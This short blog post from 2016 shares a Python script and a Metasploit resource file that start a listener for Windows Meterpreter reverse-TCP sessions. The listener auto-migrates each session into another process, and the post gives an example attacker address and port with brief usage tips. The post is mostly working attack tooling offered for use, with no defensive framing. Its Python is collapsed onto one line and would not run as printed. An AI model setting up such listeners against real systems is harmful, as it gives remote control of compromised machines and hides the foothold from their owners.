Loading

Quickly Start Listener scripts

#!/usr/bin/python
#
# StartListener.py
# Simple python script to start a Meterpreter Listener
# Auto Inject to other process
# github: https://raw.github.com/obscuresec/random/master/StartListener.py

import sys import subprocess #write a resource file and call it def build(lhost,lport): options = "use exploit/multi/handler\n" options += "set payload windows/meterpreter/reverse_tcp\nset LHOST {0}\nset LPORT {1}\n".format(lhost,lport) options += "set ExitOnSession false\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j\n" filewrite = file("listener.rc", "w") filewrite.write(options) filewrite.close() subprocess.Popen("/usr/share/metasploit-framework/msfconsole -r listener.rc", shell=True).wait() #grab args try: lhost = sys.argv[1] lport = sys.argv[2] build(lhost,lport) #index error except IndexError: print "python StartListener.py lhost lport"

A easy but useful script. It create a file of metaspolit and load it to start a listener quickly.

You can change the listener type you what.

Before using it, you may also have to change the path of msfconsole file.

 If you installed the metaspolit-framework on you system, you can use "/usr/bin/msfconsole"

 

You  can also create a file, such as "listen.rc"

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.150
set LPORT 8888
set ExitOnSession false
set AutoRunScript post/windows/manage/migrate
exploit -j

Then,use it to start a listen.

msfconsole -r listen.rc

 

posted @ 2016-08-22 14:51  ssooking  阅读(388)  评论(0编辑  收藏  举报